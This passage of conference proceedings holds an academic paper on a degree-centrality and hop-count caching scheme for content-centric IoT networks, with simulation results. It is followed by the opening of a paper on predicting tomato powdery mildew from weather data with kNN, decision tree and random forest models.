G. Goel
School of Computer Science, CEC, Landran, University of Petroleum and Energy Studies, Energy
Acres, Bidholi, Dehradun 248007, India


1 Introduction

IoT emerges as the collection of devices which are connected using the Internet [1, 2].
The IoT devices and their applications focus on accessing the required content with
minimal latency instead of focusing on the location of the content source [3]. In this
direction, the host-centric properties of the current IP-based Internet environment
[4, 5] deviate fundamentally from the data-centric requirements of IoT applications.
The tremendous increase in the count of connected IoT nodes and their data needs
has also raised various challenges for IP-based networks related to the efficient
handling of the content [6].
To mitigate the restrictions of the existing Internet design, a novel CCN architecture
has recently been proposed [7] in which each content has a unique name, and the
devices access the contents using these names. The in-network caching capabilities
[8] make CCN the most suitable architecture for latency-sensitive IoT applications.
For content-centric information retrieval in IoT networks, CCN implements three
data structures called the forwarding-information-base (FIB), the pending-interest-
table (PIT) and the content-store (CS) [9, 10]. To access a content, the IoT device
generates the Interest message and forwards it towards the content provider/server
using single-hop/multi-hop communication. After analysing the Interest message, a
content provider creates the content message with the required payload and forwards
it in the reverse direction towards the requester.
During content message forwarding, the intermediate routers also perform content
caching operations to reduce the server load and bandwidth requirements, which also
increases the QoS for the requesters [11]. Generally, the intermediate routers have
extremely small cache storage as compared to the content catalogue size in the
network. Hence, efficient content placement/replacement operations play an important
role in the performance of the CCN. The content caching decisions include content
placement (choosing an appropriate router to cache the content) and content
replacement (evicting older content from the CS of the router if it becomes full)
operations [12, 13]. In order to effectively utilize the available network resources, an
efficient caching scheme is necessary to increase the QoS for the IoT devices.
In this direction, it is argued that placing the frequently accessed contents, for a
longer duration, on those routers that have a higher degree-centrality and are near
the edges of the network would improve the network performance. Therefore, the
proposed scheme jointly considers the router's degree, the distance traversed by the
Interest message from the content provider, and the content popularity for caching
decisions during content forwarding.

2 Literature Review

Presently, the connected world of IoT devices has turned out to be a reality that spans
several application domains such as smart wearables, smart cities, health care and
energy management systems [14]. To improve data dissemination in the IoT
environment, CCN implements in-network caching to minimize the network delay
and bandwidth requirements. The effectiveness of the content caching mechanism
determines the improvement in the QoS offered to the IoT devices (requesters), as
the cache sizes of the network routers are too small to store huge data transmissions.
Therefore, various caching strategies have been suggested by researchers that place
the contents in the network routers to reduce the server load and deliver the requested
contents with reduced latency.
The leave-copy-everywhere (LCE) [7] caching scheme is the traditional strategy
for the CCN that copies the content in every intermediate router. The random
probability-based placement scheme (Prob) [15] considers the random probability to
cache the contents. The scheme provides a simple mechanism for the caching oper-
ations, which is independent of the network and content characteristics. The Prob-
cache [16] scheme determines the route caching capability during the data placement
decisions and equitably multiplex the contents of diverged routes.
A centrality metric centred caching strategy is recommended in [17], which selec-
tively places the content replicas in the network by considering the betweeness
centrality of the on-path routers. The CPNDD scheme [18] jointly considers the
node degree centrality and hop-count characteristics to determine suitable router
for content placement operations. The caching strategy discussed in [19] uses the
combination of several centrality metrics and popularity of contents for caching
decisions.
The MAX-gain in-network caching (MAGIC) [20] scheme performs content
caching operations using the content access pattern and the distance parameters. The
fine-grained popularity-based caching (FGPC) scheme [21] determines the content
access frequency using a distinguished data structure and uses a static value to deter-
mine the frequently accessed contents. The DPWCS [22] implements a novel data
structure in all network routers to filter popular contents and perform caching oper-
ations in those intermediate routers that experience higher access frequency for that
content.

3 Proposed Caching Scheme

The proposed mechanism explores the caching performance by jointly considering
degree centrality and hop-count for the caching decisions. The degree centrality of a
router is determined as the number of edges connected to the router. Increasing the
caching probability for the higher degree-centrality routers increases the content
availability in the network, as higher degree-centrality routers receive a larger number
of Interest messages. The caching probability also grows as the content message
traverses the delivery path, so as to store the contents towards the requesters in the
network. To simplify further discussion, the following notations are used in the paper:

• R: Collection of the network routers and Ri signifies ith router.


• CS(Ri ): Content store size of ith router.
• I j /C j : jth Interest/Content message with content name C_Name(I j ).
• Hop(I j )/Hop(C j ): Number of hops traversed by I j /C j .
• DC(Ri ): Degree centrality of router Ri .
• Max(DC(I j )): Maximum degree centrality encountered by I j in the path.
• λ: Content request rate in the network.
• |N|: Content catalogue size (Entire set of distinguished contents).
Processing of Interest Message: To access a content (C j), the requester IoT device
creates the Interest message (I j), which has two additional fields, Max(DC(I j)) and
Hop(I j), both initialized to 0. The device transmits the Interest message (I j) to the
nearest router Ri. On receiving the Interest message, each on-path router (Ri) performs
the following operations (a condensed sketch follows the list):
1. Hop(I j ) = Hop(I j ) + 1
2. If DC(Ri ) > Max(DC(I j )) then, Max(DC(I j )) = DC(Ri )
3. Then, Ri checks its storage for the required content. If the cache holds the corre-
sponding content C j, then the router performs the processing-of-content-message
procedure (discussed subsequently).
4. Otherwise, repeat steps 5 to 7 until the cache hit occurred in the CS(Ri ) or I j
reaches the content server which have the entire content catalogue.
5. Ri looks up its PIT for a previously forwarded request matching I j. If such an entry
exists, then router Ri aggregates I j in its PIT and discards the request.
6. If no record exists in the PIT for I j then, Ri searches its FIB to forward the I j
to the suitable upstream router/server in the network and create an entry in the
PIT.
7. If no suitable information exists in FIB, then Ri would remove I j from the
network.
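
The Interest-processing steps above can be condensed into the following Python
sketch. The Router class, its dictionary-based CS/PIT/FIB, and the sample content
name are simplifying assumptions made for illustration and omit the real CCN
packet formats.

# Simplified sketch of Interest processing at an on-path router R_i.
# CS, PIT and FIB are modelled as plain dictionaries/sets for illustration only.
class Router:
    def __init__(self, name, degree):
        self.name = name
        self.degree = degree        # DC(R_i): number of connected edges
        self.cs = {}                # content store: name -> payload
        self.pit = {}               # pending interests: name -> set of faces
        self.fib = {}               # forwarding info: name prefix -> next hop

    def on_interest(self, interest, in_face):
        interest["hops"] += 1                               # Hop(I_j) += 1
        interest["max_dc"] = max(interest["max_dc"], self.degree)
        name = interest["name"]
        if name in self.cs:                                 # cache hit
            return ("content", self.cs[name])
        if name in self.pit:                                # aggregate duplicate request
            self.pit[name].add(in_face)
            return ("aggregated", None)
        next_hop = self.fib.get(name)
        if next_hop is None:                                # no FIB entry: drop Interest
            return ("dropped", None)
        self.pit[name] = {in_face}                          # record pending Interest
        return ("forwarded", next_hop)

interest = {"name": "/iot/sensor/42", "hops": 0, "max_dc": 0}
r = Router("R1", degree=3)
r.fib["/iot/sensor/42"] = "R2"
print(r.on_interest(interest, in_face="consumer"), interest)
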
Processing of Content Message: When the content hit occurs in CS(Rm) or I j
reaches the content server, then Rm/the server prepares the corresponding content
message (C j). Rm/the server then copies the Hop(I j) and Max(DC(I j)) information
from I j into the corresponding fields of C j. The content provider initializes the value
of Hop(C j) to 0 and forwards C j in the reverse direction towards the requester. On
receiving the message (C j), each intermediate on-path router (Ri) performs the
following operations:
1. Hop(C j ) = Hop(C j ) + 1
2. If no pending Interest message exists in the PIT, then remove C j from the network
without caching operations.
3. If PIT entry exists for the C j , then the router Ri forwards C j towards the
requesters as per its PIT.
4. For content placement operations, Ri computes the value of the Gain_{R_i}^{C_j}
parameter using Eq. (1) as follows:

Table 1 Simulation parameters

Parameter                                  | Value
CS(Ri)                                     | 50
ψ                                          | 0.1–1.0
λ                                          | 50/s
Payload size                               | 1 KB
Content catalogue size (|N|)               | 5000
Exponent value in Zipf distribution (α)    | 0.8
Network topology                           | Abilene [23]
Simulation duration                        | 1050 STU (Simulation Time Unit)

 
Gain_{R_i}^{C_j} = \frac{DC(R_i)}{Max(DC(I_j))} \times \frac{Hop(C_j)}{Hop(I_j)}    (1)

5. If CS(Ri) is already full, then the older content is removed from the cache space
using the least frequently used (LFU) cache replacement strategy. Then, Ri forwards
the content towards the requesters after making the caching decision using Eq. (2);
a short sketch of this decision follows the equation.

Cache\_Content(R_i, C_j) = \begin{cases} True, & \text{if } Gain_{R_i}^{C_j} \geq \psi \\ False, & \text{if } Gain_{R_i}^{C_j} < \psi \end{cases}    (2)
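
Equations (1) and (2) translate into only a few lines of code. The Python sketch
below is illustrative; the sample degree, hop counts, and the ψ = 0.2 threshold (the
value used later in the simulations) are the only inputs, and LFU eviction is not
shown here.

# Caching decision from Eqs. (1) and (2): cache content C_j at router R_i
# only if its gain reaches the threshold psi. Sample values are hypothetical.
def gain(dc_ri, max_dc_ij, hop_cj, hop_ij):
    """Gain of caching content C_j at router R_i (Eq. 1)."""
    return (dc_ri / max_dc_ij) * (hop_cj / hop_ij)

def cache_content(dc_ri, max_dc_ij, hop_cj, hop_ij, psi=0.2):
    """Placement decision of Eq. 2 with the threshold psi used in the paper."""
    return gain(dc_ri, max_dc_ij, hop_cj, hop_ij) >= psi

# Router with degree 3 on a path whose maximum degree was 5;
# the content has travelled 2 of the 4 hops back towards the requester.
print(cache_content(dc_ri=3, max_dc_ij=5, hop_cj=2, hop_ij=4))  # True (gain = 0.3)
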

For the optimal value of ψ, the performance of the proposed caching scheme
has been explored for different values of ψ in the ndnSIM simulation with param-
eters mentioned in Table 1. During executions, the optimal network performance
is obtained with ψ = 0.2, and therefore, this value is used during the simulations.
Although the configuration of the threshold parameter is relatively arbitrary for the
simulations and may change for other network topologies, it provides a good starting
point to explore the caching performance in the CCN-based IoT environment.

4 Performance Evaluation

The QoS delivered by the proposed caching scheme is examined against several
competing peer strategies mentioned in the literature review section, namely the
DC-based caching, LCE, Random-Prob(0.3) and FGPC caching mechanisms. The
default cache replacement strategy used with the peer schemes is least recently used
(LRU). The performance of the caching schemes has been compared on three
parameters: cache hit ratio, network hop-count and the latency (delay) in retrieving
the requested content.

Fig. 1 Cache hit ratio with α = 0.8, λ = 50/s and |N| = 5000: (a) CS(Ri) = 50, (b) CS(Ri) = 100

The average hit ratio is determined as the fraction of the total number of cache-hit
operations over the requests encountered by the routers per unit time. Figure 1a
shows the average network hit ratio when the cache size of the in-network routers
has been set to 50 contents. Initially, the caching schemes experience a lower average
hit ratio because the network caches are empty in the beginning. With time, the
performance of the content placement strategies increases as the routers begin
placing the forwarded contents as per the caching policies. During the simulations,
the proposed scheme shows 4.3%, 5.1%, 4.8% and 5.0% improvement in the average
cache hit ratio over the DC-based, LCE, Prob(0.3) and FGPC caching strategies,
respectively. When the cache size of the network routers is increased to 100 contents
per router during the simulation, an improvement in the hit ratio for each caching
mechanism is observed, as shown in Fig. 1b. The results illustrate that the proposed
mechanism outperforms the peer schemes by demonstrating up to a 6.1% gain in the
average hit ratio.
The value of the hop-count metric for an Interest is determined as the sum of the
number of hops traversed by the Interest message to reach the content provider and
by the corresponding content message during its delivery. Figure 2a illustrates the
average network hop-count observed for the caching mechanisms when the caching
capacity of the network routers is 50. In this scenario, the proposed scheme observes
a 13.1%, 15.4%, 14.5% and 14.2% drop in the average hop-count from the DC-based,
LCE, Prob(0.3) and FGPC schemes, respectively. When the caching capacity of the
intermediate routers increases to 100 contents, the proposed solution achieves up to
a 16.6% drop in the average network hop-count over the peer competing schemes.
The value of the average network delay is the time period between the creation of
the Interest message and the delivery of the corresponding content to the requester.
When the caching capacity of the routers is 50, the proposed strategy reduces the
average delay by up to 14.5% compared with the existing schemes, as shown in
Fig. 3a. Analogous performance gains are obtained by the proposed scheme when
the cache space of the routers is increased to 100, where the proposed strategy
decreases the average network delay by between 11 and 12.5% compared with the
existing peer schemes, as shown in Fig. 3b.
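
For reference, the three metrics can be computed from a per-request log as in the
short Python sketch below; the log format (hit flag, Interest hops, content hops,
delay) and the sample values are assumptions made only for illustration.

# Illustrative computation of the three evaluation metrics from a hypothetical
# per-request log: (hit, interest_hops, content_hops, delay_in_microseconds).
requests = [
    (True, 2, 2, 1200.0),
    (False, 4, 4, 3100.0),
    (True, 1, 1, 800.0),
]

cache_hit_ratio = sum(1 for hit, *_ in requests if hit) / len(requests)
avg_hop_count = sum(ih + ch for _, ih, ch, _ in requests) / len(requests)
avg_delay = sum(d for *_, d in requests) / len(requests)

print(f"hit ratio={cache_hit_ratio:.2f}  hops={avg_hop_count:.1f}  delay={avg_delay:.0f} us")
# hit ratio=0.67  hops=4.7  delay=1700 us
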

Fig. 2 Average network hop-count with α = 0.8, λ = 50/s and |N| = 5000: (a) CS(Ri) = 50, (b) CS(Ri) = 100

Fig. 3 Average network delay (in microseconds) with α = 0.8, λ = 50/s and |N| = 5000: (a) cache size = 50, (b) cache size = 100

5 Conclusion

In this paper, a novel caching scheme has been proposed which is suitable for the
CCN-based IoT environment. The scheme jointly considers the node degree
centrality, hop-count metrics and the LFU strategy for the content caching decisions.
The performance of the proposed caching scheme is compared with various state-
of-the-art schemes such as LCE, DC-based, Prob(0.3) and FGPC. When the ratio of
CS(Ri) and |N| is 1%, the proposed strategy achieves up to a 5.1% increase in the
average cache hit ratio and reduces the network hop-count and delay by up to 15.4%
and 14.5%, respectively, compared with the peer caching schemes. Analogous
performance improvement is experienced when the cache space of the network
routers is enlarged to 100 contents (2% of |N|), where the proposed scheme shows
significant performance improvement over the competing strategies. Hence, the
proposed scheme is suitable for large-scale CCN-based IoT networks and their
applications. In future, more characteristics of the contents and networks will be
explored to improve the QoS under dynamic network topologies.

References

1. Khan, E., Garg, D., Tiwari, R., & Upadhyay, S. (2018). Automated toll tax collection system
using cloud database. In 2018 3rd International Conference On Internet of Things: Smart
Innovation and Usages (IoT-SIU) (pp 1–5). IEEE.
2. Djama, A., Djamaa, B., & Senouci, M. R. (2020). Information-centric networking solutions
for the internet of things: a systematic mapping review. Computer Communications.
3. Din, I. U., Asmat, H., & Guizani, M. (2019). A review of information centric network based
internet of things: Communication architectures, design issues, and research opportunities.
Multimedia Tools and Applications, 78(21), 30241–30256.
4. Tiwari, R., & Kumar, N. (2016). An adaptive cache invalidation technique for wireless
environments. Telecommunication Systems, 62(1), 149–165.
5. Tiwari, R., & Kumar, N. (2015). Minimizing query delay using co-operation in ivanet. Procedia
Computer Science, 57, 84–90.
6. Arshad, S., Azam, M. A., Rehmani, M. H., & Loo, J. (2018). Recent advances in information-
centric networking-based internet of things (icn-iot). IEEE Internet of Things Journal, 6(2),
2128–2158.
7. Jacobson, V., Smetters, D. K., Thornton, J. D., Plass, M. F., Briggs, N. H., & Braynard, R.
L. (2009). Networking named content. In Proceedings of the 5th International Conference on
Emerging Networking Experiments and Technologies. Association for Computing Machinery,
New York, NY, USA, CoNEXT ’09 (pp. 1–12). https://doi.org/10.1145/1658939.1658941
8. Hail, M. A., Amadeo, M., Molinaro, A., & Fischer, S. (2015). Caching in named data networking
for the wireless internet of things. In 2015 International Conference on Recent Advances in
Internet of Things (RIoT ) (pp. 1–6). IEEE.
9. Jacobson, V., Mosko, M., Smetters, D., & Garcia-Luna-Aceves, J. (2007). Contentcentric
networking, whitepaper describing future assurable global networks (pp. 1–9). Palo Alto
Research Center, Inc.
10. Kumar, S., Tiwari, R., Obaidat, M.S., Kumar, N., Hsiao, K. F. (2020). Cpndd: Content placement
approach in content centric networking. In ICC 2020–2020. IEEE International Conference
on Communications (ICC) (pp. 1–6). IEEE.
11. Abdullahi, I., Arif, S., & Hassan, S. (2015). Survey on caching approaches in information
centric networking. Journal of Network and Computer Applications, 56, 48–59.
12. Tiwari R, Kumar N (2012) A novel hybrid approach for web caching. In 2012 Sixth International
Conference on Innovative Mobile and Internet Services in Ubiquitous Computing (pp. 512–
517). IEEE.
13. Tiwari, R., Sharma, H. K., Upadhyay, S., Sachan, S., & Sharma, A. (2019). Automated parking
system-cloud and iot based technique. International Journal of Engineering and Advanced
Technology (IJEAT), 8(4C), 116–123.
14. Naeem, M. A., Ali, R., Kim, B. S., Nor, S. A., & Hassan, S. (2018). A periodic caching strategy
solution for the smart city in information-centric internet of things. Sustainability, 10(7), 2576.
15. Arianfar, S., Nikander, P., Ott, J. (2010). On content-centric router design and implications.
In Proceedings of the Re-Architecting the Internet Workshop, Association for Computing
Machinery, New York, NY, USA, ReARCH ’10 (pp. 1–6). https://doi.org/10.1145/1921233.
1921240
16. Psaras, I., Chai, W. K., Pavlou, G. (2012). Probabilistic in-network caching for information-
centric networks. In Proceedings of the Second Edition of the ICN Workshop on Information-
Centric Networking (pp. 55–60).
17. Chai, W. K., He, D., Psaras, I., & Pavlou, G. (2013). Cache “less for more” in information-centric
networks (extended version). Computer Communications, 36(7), 758–770.
18. Kumar, S., Tiwari, R. (2020). An efficient content placement scheme based on normalized node
degree in content centric networking. Cluster Computing, 1–15.
19. Gao, Y., Zhou, J. (2019). Probabilistic caching mechanism based on software defined content
centric network. In 2019 IEEE 11th International Conference on Communication Software and
Networks (ICCSN) (pp. 210–214). IEEE.

20. Ren, J., Qi, W., Westphal, C., Wang, J., Lu, K., Liu, S., & Wang, S. (2014). MAGIC: a distributed
MAx-gain in-network caching strategy in information centric networks. In 2014 IEEE Confer-
ence on Computer Communications Workshops (INFOCOM WKSHPS) (pp. 470–475). IEEE.
https://doi.org/10.1109/infcomw.2014.6849277
21. Ong, M. D., Chen, M., Taleb, T., Wang, X., & Leung, V. C. (2014). FGPC: fine-grained
popularity-based caching design for content centric networking. In Proceedings of the 17th
ACM International Conference on Modeling Analysis and Simulation of Wireless and Mobile
Systems—MSWiM ’14 (pp. 295–302). ACM Press. https://doi.org/10.1145/2641798.2641837
22. Kumar, S., & Tiwari, R. (2020). Optimized content centric networking for future internet:
dynamic popularity window based caching scheme. Computer Networks, 179, 107434.https://
doi.org/10.1016/j.comnet.2020.107434
23. Alderson, D., Li, L., Willinger, W., & Doyle, J. C. (2005). Understanding internet topology:
Principles models and validation. IEEE/ACM Transactions on Networking, 13(6), 1205–1218.
A Forecasting Technique for Powdery
Mildew Disease Prediction in Tomato
Plants

Anshul Bhatia, Anuradha Chug, Amit Prakash Singh, Ravinder Pal Singh,
and Dinesh Singh

Abstract In the current scenario, plant disease detection is seeking attention from
many agricultural scientists. Plant diseases are deeply influenced by the weather
conditions, and each disease has its individual weather requirements. The changes
in weather parameters such as humidity, temperature, wind speed, etc., can cause
many diseases in tomato plants. The current empirical study focuses on powdery mildew,
a disease of tomato caused by the fungus Leveillula taurica, which belongs
to the class Leotiomycetes and is responsible for the occurrence of this specific disease
in tomatoes. In this research, three weather-based prediction models have been devel-
oped using k-nearest neighbor (kNN), decision tree (DT), and random forest (RF)
algorithm for powdery mildew disease prediction in tomatoes at an early stage.
Results indicate that the proposed model, based on RF algorithm, shows the best
accuracy of 93.24% for tomato powdery mildew disease (TPMD) dataset. A real-
time version of the proposed model can be used by the agricultural experts to take
preventive measures in the most sensitive areas that are prone to powdery mildew
disease based on the weather conditions. Hence, timely intervention would help in
reducing the loss in productivity of tomato crops which will further benefit the global
economy, agricultural production, and the food industry.

Keywords Plant disease · Tomato · Random forest · Prediction · Decision tree · k-nearest neighbor

A. Bhatia (B) · A. Chug · A. P. Singh


University School of Information, Communication & Technology, Guru Gobind Singh
Indraprastha University, Dwarka, Sector-16 C, New Delhi 110078, India
e-mail: anshul.usict.127164@ipu.ac.in
A. Chug
e-mail: anuradha@ipu.ac.in
A. P. Singh
e-mail: amit@ipu.ac.in
R. P. Singh · D. Singh
Division of Plant Pathology, Indian Agricultural Research Institute (IARI), New Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_41

1 Introduction

Tomato is one of the most widely consumed fruit crops, whose yield and quality are
highly affected by rapidly changing weather conditions as well as global
warming. This crop suffers from various severe diseases, namely early blight, bacte-
rial leaf spot, leaf mold, powdery mildew, fusarium wilt, gray mold, late blight, and
many more. Powdery mildew is the most common fungal disease found in tomato
plants and is caused by the harmful pathogen Leveillula taurica [1].
Changes in the climatic conditions can aggravate the risk of disease development in
the agricultural sector. A standardized range of weather conditions of a particular
area plays a crucial role in the productivity of any crop. However, any deviation
from the normal weather conditions may cause the risk of disease development in
the plant which can degrade its quality and productivity. Weather parameters such
as wind speed, global radiation, humidity, temperature, and leaf wetness are the
most critical factors, which are liable for the growth of powdery mildew disease in
tomato crop [2, 3]. In the last decade, agricultural scientists have mostly proposed
image-based forecasting models for the prediction of tomato powdery mildew
disease [4–8]; however, very few of them have worked on
weather-based disease forecasting models [2, 9–12].
Many scientists have worked on tomato powdery mildew disease forecasting till
date, and few important studies are discussed here. Guzman-Plazola [9] proposed
a spray forecasting model for early prediction and prevention of powdery mildew
disease in tomato plants using a well-known machine learning approach, i.e., linear
discriminant analysis (LDA). He tested this model for two years between 1995 and
1996 on tomato fields of northern San Joaquin and southern Sacramento Valleys of
California. This model was capable of generating risk warnings and spray recom-
mendations based on the favorable weather conditions for the development of this
disease. In the year 2010, Ghaffari et al. [13] used various techniques based on artifi-
cial neural network (ANN) for the early detection of the same disease carried out in
current research. In one of the studies, Rumpf et al. [14] have applied the concept of
hyperspectral reflectance in conjunction with support vector machine (SVM) clas-
sifier for timely detection of powdery mildew. Further, Prince et al.[15] have also
contributed to this research by developing an image-based disease prediction model
by using SVM classifier. In the year 2015, Mokhtar et al. [16] also successfully
applied an SVM-based machine learning approach with Gabor wavelet transform
for disease detection. In one of the researches, Fuentes et al. [4] have also developed
disease prediction models by using various deep learning techniques and found that
the proposed models were efficient enough to identify the nine different types of pests
and tomato plant diseases including the complex scenarios of plants’ surrounding
areas. The authors have also built a deep learning-based mobile application for predicting
several tomato plant diseases, powdery mildew among them [5], which takes an image
as input; in the current research, by contrast, we try
to find the best possible machine learning technique in order to develop
a forecasting model for powdery mildew disease detection in tomato plants using
sensors data. Three machine learning techniques viz. k-nearest neighbor (kNN) [17],
decision tree (DT) [18], and random forest (RF) [19] are used to build the disease
prediction model. The performance of all the three models has been compared using
the most prominent accuracy metric which in turn helped to choose the best predic-
tion model. Results of this study can help the farmers as well as agricultural scientists
for early detection of this disease, and further, timely preventive measures can be
adopted in order to increase the quality of the crop.
The remaining paper is organized in the following manner: Sect. 2 highlights the
prior studies followed by research methodology in Sect. 3. Experimental results are
discussed in Sect. 4. Lastly, Sect. 5 summarizes the whole study with its future scope.

2 Literature Review

In literature, many researchers have proposed disease prediction models for various
plants. A few of them have been discussed in this section. In 2016, Sabrol and
Kumar used the concept of DT to detect various tomato plant diseases. Their model
achieved an accuracy of 76% [20]. Further, in 2018, Verma et al. published a
review paper on various disease prediction models based on machine learning and
image processing techniques [5]. In the next year, they developed a deep learning-
based android application for tomato disease prediction [8]. In 2020, Verma et al.
have also used the concept of capsule networks for potato disease diagnosis. Their
model was 91.83% accurate [7]. Further, in 2020, Bhatia et al. have used the concept
of extreme learning machine (ELM) algorithm with various resampling techniques to
detect powdery mildew disease in tomato plants [12]. They have achieved the predic-
tion accuracy of 89.91% in their study. In the same year, they have also proposed a
hybridized model for tomato powdery mildew disease prediction. Their model was
92.37% accurate [10]. Again in 2020, Bhatia et al. also proposed a feature selection-
based approach for soybean disease diagnosis. Their technique has achieved an accu-
racy of 98.10% [11]. In the current study, we have also tried to develop a robust and
efficient technique for powdery mildew disease prediction in tomato plants.

3 Research Methodology

This section explains the overall methodology being followed in this paper with a
diagrammatic representation as shown in Fig. 1. Initially, tomato powdery mildew
disease (TPMD) dataset has been divided into 70% training and 30% testing data.
Further, three prediction models have been developed for TPMD dataset using kNN,
DT, and RF techniques. Lastly, on the basis of the performance measure metric, i.e.,
accuracy, the best model has been identified among the three prediction models
deployed in the current study. The proposed method has been implemented in
“RStudio Version 1.1.463.” The datasets have been elaborated in Sect. 3.1. Further,
Fig. 1 Block diagram of the proposed approach: TPMD dataset → partition the dataset into a 70–30 train-test ratio → develop prediction models on the train set using the machine learning algorithms DT, RF, and kNN → validate/test the models on the test set → comparative analysis of the prediction models using the accuracy metric

an overview of kNN, DT, and RF algorithms has been provided in Sects. 3.2, 3.3
and 3.4, respectively. Lastly, Sect. 3.5 describes the performance metric used in this
study, i.e., the accuracy.
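A compact way to read Fig. 1 is as a split-train-evaluate loop. The Python sketch below is only an illustration (the study itself was implemented in RStudio, and the hyperparameters shown, such as k = 3 for kNN, are assumptions rather than the authors' settings).

```python
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score

def compare_models(X, y, seed=42):
    # 70-30 train-test partition of the TPMD observations (Fig. 1)
    X_tr, X_te, y_tr, y_te = train_test_split(X, y, train_size=0.7, random_state=seed)
    models = {
        "kNN": KNeighborsClassifier(n_neighbors=3),
        "DT": DecisionTreeClassifier(random_state=seed),
        "RF": RandomForestClassifier(random_state=seed),
    }
    # Train each model on the train set, test it on the test set, report accuracy
    return {name: accuracy_score(y_te, m.fit(X_tr, y_tr).predict(X_te))
            for name, m in models.items()}
```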

3.1 Dataset

A sensor-based time-series dataset, i.e., TPMD has been used in this study [2]. The
TPMD dataset provides information about the conduciveness of a particular day in
terms of tomato powdery mildew disease development based on various meteorolog-
ical parameters. These parameters include wind speed (WS), temperature (T), global
radiations (GR), relative humidity (RH), and leaf wetness (LW). The TPMD dataset
comprises 244 observations, in which the above-mentioned meteorological param-
eters are considered as predictive (independent) variables and conduciveness/non-
conduciveness of a day is taken as response (dependent) variable. The dataset can
be accessed through the following link: https://bit.ly/2QQpNvW.

3.2 K-Nearest Neighbor (kNN)

kNN is a widely used supervised machine learning algorithm which uses the concept
of “close proximity (similar things are near to you)” to predict the class label of new
data point [17]. Let us assume that X is a training dataset which contains n number of
data points (X 1 ,X 2 …, Xn) and m number of attributes (a1 , a2 …, am ). Further, k is the
assumed integer value which indicates the number of nearest data points, and Y i is
a test data point with equal number of attributes as training dataset. So, the working
of kNN can be understood with the help of following steps:
Step 1: Calculate the distance between the test data point, Y i and each row of the
train dataset X with the help of one of the distance functions, namely Manhattan or
Euclidean. Both of these functions are based on the Minkowski distance formula, which
calculates distance (D) between two variables U and V as shown in Eq. (1). In Eq. (1),
if p = 1, then it represents Manhattan distance, and if p = 2, then it shows Euclidean
distance.
D = \left( \sum_{i=1}^{n} |U_i - V_i|^p \right)^{1/p} \quad (1)

Step 2: Afterward, on the basis of the distance from test data point Y i , sort each
training sample (data point) in ascending order and store it in an array.
Step 3: Next, kNN algorithm will choose top k data points from the sorted array.
Step 4: Lastly, a class label will be assigned to the test data point on the basis of
the most frequent class of these k data points or the nearest neighbors.
The above algorithm can be explained with the help of an example. Suppose, in
Fig. 2, “circle” symbol represents the data samples belonging to the conducive class,
whereas the “star” symbol shows the data samples belonging to the non-conducive
class. Further, Q1 is the new sample to be classified and k = 3. Hence, kNN algorithm
will find three nearest neighbors of the respective new sample Q1 . It can be seen from
Fig. 2 that out of the three nearest neighbors, two belongs to the non-conducive class
that is why sample Q1 will be assigned to the non-conducive class.
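The four steps above can be written down directly; the following Python sketch is an illustrative reimplementation (not the authors' R code), with hypothetical toy samples for the conducive and non-conducive classes.

```python
import numpy as np
from collections import Counter

def minkowski(u, v, p=2):
    # Eq. (1): p = 1 gives the Manhattan distance, p = 2 the Euclidean distance
    return np.sum(np.abs(u - v) ** p) ** (1.0 / p)

def knn_predict(X_train, y_train, x_test, k=3, p=2):
    # Step 1: distance from the test point to every training sample
    distances = [minkowski(x, x_test, p) for x in X_train]
    # Steps 2-3: sort by distance and keep the k nearest neighbours
    nearest = np.argsort(distances)[:k]
    # Step 4: the majority class among the k neighbours is the predicted label
    return Counter(y_train[i] for i in nearest).most_common(1)[0][0]

# Hypothetical (temperature, relative humidity) samples
X_train = np.array([[22.0, 85.0], [24.0, 88.0], [30.0, 40.0], [31.0, 42.0]])
y_train = np.array(["conducive", "conducive", "non-conducive", "non-conducive"])
print(knn_predict(X_train, y_train, np.array([23.0, 86.0])))  # -> conducive
```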

Fig. 2 Example of kNN algorithm: samples of the conducive and non-conducive classes plotted against temperature (x-axis) and relative humidity (y-axis); the new sample Q1 is classified from its k = 3 nearest neighbours



3.3 Decision Tree (DT)

DT is a well-known machine learning algorithm which was given by Quinlan [18] in
1986. It uses a tree-like structure in which every non-leaf node denotes an experiment
on an attribute, every branch signifies the result of the experiment, and every leaf or
terminal node shows the class label based on the result of the conducted experiment.
DT follows the divide and conquer approach. If “S” is a set of training data which
contains n number of classes (c1 , c2 …cn ), then the decision tree is constructed using
the given steps:
Step 1: If S contains samples of only one single class, then all those samples
belonging to S will be leaf nodes.
Step 2: If S contains samples of more than one class, then an experiment based
on some attribute aj of training data will be performed, and S will be divided into
subsets (S 1 , S 2 ,… S l ). Here l is the number of results obtained from the experiment
performed over the attribute aj .
Step 3: Step 2 will be repeatedly performed over each S i where 1 ≤ i ≤ l, until
each subset belongs to a single class.
During the decision tree construction, the best attribute for each node can be
selected using various criteria viz. gain ratio, gini index, information gain, etc.
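As an illustration of the attribute-selection step, the sketch below scores candidate splits with the Gini index (one of the criteria listed above); it is a simplified toy version under assumed data, not the implementation used in the study.

```python
import numpy as np

def gini(labels):
    # Gini index of a label set: 1 minus the sum of squared class proportions
    _, counts = np.unique(labels, return_counts=True)
    p = counts / counts.sum()
    return 1.0 - np.sum(p ** 2)

def best_split(X, y):
    # Try every attribute/threshold pair and keep the split with the
    # lowest weighted Gini impurity of the two resulting subsets.
    best = (None, None, np.inf)
    for j in range(X.shape[1]):
        for t in np.unique(X[:, j]):
            left, right = y[X[:, j] <= t], y[X[:, j] > t]
            if len(left) == 0 or len(right) == 0:
                continue
            score = (len(left) * gini(left) + len(right) * gini(right)) / len(y)
            if score < best[2]:
                best = (j, t, score)
    return best  # (attribute index, threshold, weighted impurity)

X = np.array([[30.0, 40.0], [22.0, 85.0], [24.0, 88.0], [31.0, 42.0]])
y = np.array(["non-conducive", "conducive", "conducive", "non-conducive"])
print(best_split(X, y))  # a pure split on the first attribute
```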

3.4 Random Forest (RF)

RF is also a supervised machine learning algorithm which is a collection of a large
number of decision trees [19]. Each individual decision tree in RF predicts a class
label for a particular dataset, and the class with the highest number of votes turns out
to be the prediction of the RF model.
It is basically an ensemble method as shown in Fig. 3 and follows the given steps:
Step 1: Initially, a dataset splits into various random samples.
Step 2: Subsequently, a decision tree is constructed for each random sample.
Step 3: Further, each decision tree provides its individual prediction results.
